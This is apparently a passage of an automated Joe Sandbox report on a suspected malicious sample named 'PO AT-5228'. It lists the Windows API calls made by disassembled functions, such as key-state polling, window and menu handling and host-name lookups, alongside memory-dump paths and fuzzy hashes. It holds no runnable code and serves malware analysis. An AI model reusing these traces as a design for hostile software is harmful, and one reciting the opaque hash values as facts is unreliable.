                                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00BA7806
                                                                                        • SetActiveWindow.USER32 ref: 00BA7825
                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00BA7833
                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00BA7852
                                                                                        • Sleep.KERNEL32(000000FA), ref: 00BA785D
                                                                                        • IsWindow.USER32 ref: 00BA7869
                                                                                        • EndDialog.USER32(00000000), ref: 00BA787A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                        • String ID: BUTTON
                                                                                        • API String ID: 1194449130-3405671355
                                                                                        • Opcode ID: 81bf572c0ed04a8256d791d69d7c608b9a5d07021a91c99bc16dd81d73d13018
                                                                                        • Instruction ID: da8d7e0391a6eeadd86f0bb48f05b70139838b553c429d3731470f36c2b8f769
                                                                                        • Opcode Fuzzy Hash: 81bf572c0ed04a8256d791d69d7c608b9a5d07021a91c99bc16dd81d73d13018
                                                                                        • Instruction Fuzzy Hash: 2421547025C685AFE7115B20ECCDB2A3FA9FB46349F0001A4F50696572CFBD5D02DB21
                                                                                        APIs
                                                                                          • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                                                          • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                                                        • CoInitialize.OLE32(00000000), ref: 00BB034B
                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00BB03DE
                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00BB03F2
                                                                                        • CoCreateInstance.OLE32(00BEDA8C,00000000,00000001,00C13CF8,?), ref: 00BB043E
                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00BB04AD
                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00BB0505
                                                                                        • _memset.LIBCMT ref: 00BB0542
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00BB057E
                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00BB05A1
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00BB05A8
                                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00BB05DF
                                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 00BB05E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1246142700-0
                                                                                        • Opcode ID: 435b75d06b0c75214a7c672162b4cf87321cce146d135d930d342e616478bd16
                                                                                        • Instruction ID: 11efd104af43bd1528279da93717f3436ed896864b057b50ed37daf920ce9c89
                                                                                        • Opcode Fuzzy Hash: 435b75d06b0c75214a7c672162b4cf87321cce146d135d930d342e616478bd16
                                                                                        • Instruction Fuzzy Hash: DAB1D875A10109AFDB14EFA4C898DAEBBF9FF48304B1484A9E806EB251DB74ED45CB50
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 00BA2ED6
                                                                                        • SetKeyboardState.USER32(?), ref: 00BA2F41
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00BA2F61
                                                                                        • GetKeyState.USER32(000000A0), ref: 00BA2F78
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00BA2FA7
                                                                                        • GetKeyState.USER32(000000A1), ref: 00BA2FB8
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00BA2FE4
                                                                                        • GetKeyState.USER32(00000011), ref: 00BA2FF2
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00BA301B
                                                                                        • GetKeyState.USER32(00000012), ref: 00BA3029
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00BA3052
                                                                                        • GetKeyState.USER32(0000005B), ref: 00BA3060
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        • Opcode ID: 231d8d431d4528cd64d44755f4ce96e65ecae44fb823cde1a58c5e711117f2dd
                                                                                        • Instruction ID: 41f57a99a2d6bb3db0fa6b1019a2ca55dd97ba214fc522ed1377d22fd2d91494
                                                                                        • Opcode Fuzzy Hash: 231d8d431d4528cd64d44755f4ce96e65ecae44fb823cde1a58c5e711117f2dd
                                                                                        • Instruction Fuzzy Hash: 3951C524A0C79429FB35DBA888517AABFF4DF13740F0885DDD5C25A1C2DB949B8CC7A2
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00B9ED1E
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00B9ED30
                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00B9ED8E
                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00B9ED99
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00B9EDAB
                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00B9EE01
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00B9EE0F
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00B9EE20
                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00B9EE63
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00B9EE71
                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B9EE8E
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00B9EE9B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                        • String ID:
                                                                                        • API String ID: 3096461208-0
                                                                                        • Opcode ID: 464101e47fff4ef0c9b00a49b1aa646c40eb7a251dfc1fe11a9399d2a013df17
                                                                                        • Instruction ID: efad0541b367543494da01a1f100a4ca007d3af5ec33c1a1447962871fd7ca92
                                                                                        • Opcode Fuzzy Hash: 464101e47fff4ef0c9b00a49b1aa646c40eb7a251dfc1fe11a9399d2a013df17
                                                                                        • Instruction Fuzzy Hash: DE51FE71B00605AFDF18CF69DD85AAEBBBAEB88701F148579F51AD7290DBB0DD008B10
                                                                                        APIs
                                                                                          • Part of subcall function 00B7B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B7B759,?,00000000,?,?,?,?,00B7B72B,00000000,?), ref: 00B7BA58
                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00B7B72B), ref: 00B7B7F6
                                                                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00B7B72B,00000000,?,?,00B7B2EF,?,?), ref: 00B7B88D
                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00BDD8A6
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B7B72B,00000000,?,?,00B7B2EF,?,?), ref: 00BDD8D7
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B7B72B,00000000,?,?,00B7B2EF,?,?), ref: 00BDD8EE
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B7B72B,00000000,?,?,00B7B2EF,?,?), ref: 00BDD90A
                                                                                        • DeleteObject.GDI32(00000000), ref: 00BDD91C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 641708696-0
                                                                                        • Opcode ID: 715bd1022a551f9bcbfbf35992fd1389606d114a257f3ff190d6264c1666c55f
                                                                                        • Instruction ID: 018642da8d77d04aa1222df86bce216a19e86f3f6ca439d33952d259e2138fd7
                                                                                        • Opcode Fuzzy Hash: 715bd1022a551f9bcbfbf35992fd1389606d114a257f3ff190d6264c1666c55f
                                                                                        • Instruction Fuzzy Hash: 13619C30511600DFDB369F18D888B29B7F5FFA0311F1981AEE49A8BA60DB75AC81DF41
                                                                                        APIs
                                                                                          • Part of subcall function 00B7B526: GetWindowLongW.USER32(?,000000EB), ref: 00B7B537
                                                                                        • GetSysColor.USER32(0000000F), ref: 00B7B438
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ColorLongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 259745315-0
                                                                                        • Opcode ID: 83500d309e5254f3460dc8925659821ceab803aa7c65dbe19974026267991373
                                                                                        • Instruction ID: ad294f42d1d7c74fea6b0222d2ebb820c5f2b5b83f8b081a44ef162b7f79be59
                                                                                        • Opcode Fuzzy Hash: 83500d309e5254f3460dc8925659821ceab803aa7c65dbe19974026267991373
                                                                                        • Instruction Fuzzy Hash: 79417F31100154AFDF205F28D889FB93BA6EB55721F1882A5FDB99F2E6DB708C41DB21
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                        • String ID:
                                                                                        • API String ID: 136442275-0
                                                                                        • Opcode ID: 59a312776b0d0559b984b1857b296518def4bbb94ae9298b2966477cb4a9d801
                                                                                        • Instruction ID: 0bd5a3006a1cbd208018b96f255ee140aa21145daae7b31443bbb769eb347bad
                                                                                        • Opcode Fuzzy Hash: 59a312776b0d0559b984b1857b296518def4bbb94ae9298b2966477cb4a9d801
                                                                                        • Instruction Fuzzy Hash: 2F41FAB784511CAECB65EB94CC86DDB73FCEB44300F0041E6BA59A2051EA70ABE9CF54
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(00BFDC00,00BFDC00,00BFDC00), ref: 00BAD7CE
                                                                                        • GetDriveTypeW.KERNEL32(?,00C13A70,00000061), ref: 00BAD898
                                                                                        • _wcscpy.LIBCMT ref: 00BAD8C2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                        • API String ID: 2820617543-1000479233
                                                                                        • Opcode ID: ee2025ec5fecb53667d942573368e223a24b7611bf6834638a74e2cee77abb0d
                                                                                        • Instruction ID: 6738aa15986e60e3b223dcf6e472af3e932308f0fe07a62a5cb32b265111b1ae
                                                                                        • Opcode Fuzzy Hash: ee2025ec5fecb53667d942573368e223a24b7611bf6834638a74e2cee77abb0d
                                                                                        • Instruction Fuzzy Hash: 9C51C6751083409FC700EF14C881AAFB7E9EF86314F1088ADF5AA576A2EB35DE05DB42
                                                                                        APIs
                                                                                        • __swprintf.LIBCMT ref: 00B693AB
                                                                                        • __itow.LIBCMT ref: 00B693DF
                                                                                          • Part of subcall function 00B81557: _xtow@16.LIBCMT ref: 00B81578
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __itow__swprintf_xtow@16
                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                        • API String ID: 1502193981-2263619337
                                                                                        • Opcode ID: d54b7634ff6a0697907b712b469cb00f4fdd9da0d0e30e111e56a7d6e3ccc358
                                                                                        • Instruction ID: beeb59fd7309666418f33ae8490876fb31584ec41c5bf103b06892daba456b28
                                                                                        • Opcode Fuzzy Hash: d54b7634ff6a0697907b712b469cb00f4fdd9da0d0e30e111e56a7d6e3ccc358
                                                                                        • Instruction Fuzzy Hash: 4141D472515205EBDB24EB78D982EBAB7E8EB44300F2444EBE14AD73D1EA35A941CB14
                                                                                        APIs
                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00BCA259
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00BCA260
                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00BCA273
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00BCA27B
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BCA286
                                                                                        • DeleteDC.GDI32(00000000), ref: 00BCA28F
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00BCA299
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00BCA2AD
                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00BCA2B9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                        • String ID: static
                                                                                        • API String ID: 2559357485-2160076837
                                                                                        • Opcode ID: 058f5c9b0ede18a48417596c284888f3a4a88e7da733c22418804d0312cd9d9e
                                                                                        • Instruction ID: b39bc410cff917f22ccfb84bc295baf8dd95bf9928111b1455afd6822a858bdb
                                                                                        • Opcode Fuzzy Hash: 058f5c9b0ede18a48417596c284888f3a4a88e7da733c22418804d0312cd9d9e
                                                                                        • Instruction Fuzzy Hash: DF319E31100118AFDF215FA4DC89FEA3BA9FF09364F100218FA19AA0E0CB75D811DBA5
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                        • String ID: 0.0.0.0
                                                                                        • API String ID: 2620052-3771769585
                                                                                        • Opcode ID: cdc46477a853d83ddcb26a5d6cbc3a842eb456a04bf3cd65a9eaeee1e410241a
                                                                                        • Instruction ID: 528d610983690e2e2299919977ea3e9cd2311680c2f4a403820ba0a22b799d0c
                                                                                        • Opcode Fuzzy Hash: cdc46477a853d83ddcb26a5d6cbc3a842eb456a04bf3cd65a9eaeee1e410241a
                                                                                        • Instruction Fuzzy Hash: BC11D2B2508115AFCB24BB60AC4AEDA77E8EF41710F0400E5F505AB091EEB1EE858B50
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B85047
                                                                                          • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                                                        • __gmtime64_s.LIBCMT ref: 00B850E0
                                                                                        • __gmtime64_s.LIBCMT ref: 00B85116
                                                                                        • __gmtime64_s.LIBCMT ref: 00B85133
                                                                                        • __allrem.LIBCMT ref: 00B85189
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B851A5
                                                                                        • __allrem.LIBCMT ref: 00B851BC
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B851DA
                                                                                        • __allrem.LIBCMT ref: 00B851F1
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B8520F
                                                                                        • __invoke_watson.LIBCMT ref: 00B85280
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                        • String ID:
                                                                                        • API String ID: 384356119-0
                                                                                        • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                        • Instruction ID: 4a81141b2ebc42801f879746eacd424d998f355e708d1da62ccd1773b9dfa3af
                                                                                        • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                        • Instruction Fuzzy Hash: 9D71C775A01B17ABDB24BE78CC81BAAB3E8EF04764F1442B9F510D6291EB70D940CBD0
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BA4DF8
                                                                                        • GetMenuItemInfoW.USER32(00C21708,000000FF,00000000,00000030), ref: 00BA4E59
                                                                                        • SetMenuItemInfoW.USER32(00C21708,00000004,00000000,00000030), ref: 00BA4E8F
                                                                                        • Sleep.KERNEL32(000001F4), ref: 00BA4EA1
                                                                                        • GetMenuItemCount.USER32(?), ref: 00BA4EE5
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00BA4F01
                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00BA4F2B
                                                                                        • GetMenuItemID.USER32(?,?), ref: 00BA4F70
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BA4FB6
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BA4FCA
                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BA4FEB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4176008265-0
                                                                                        • Opcode ID: 69623f3f74ca4d0fb6387835008533dd563773972815e21e92285069d49861e1
                                                                                        • Instruction ID: d68b35700fbf13a87b3d9f0cc95a3711ee5425419c7bbecaff93a2df79746ac9
                                                                                        • Opcode Fuzzy Hash: 69623f3f74ca4d0fb6387835008533dd563773972815e21e92285069d49861e1
                                                                                        • Instruction Fuzzy Hash: C361A271908289AFDF21CF68DC84EAE7BF8FB82304F140599F945A7251D7B2AD05CB21
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00BC9C98
                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00BC9C9B
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BC9CBF
                                                                                        • _memset.LIBCMT ref: 00BC9CD0
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BC9CE2
                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00BC9D5A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$LongWindow_memset
                                                                                        • String ID:
                                                                                        • API String ID: 830647256-0
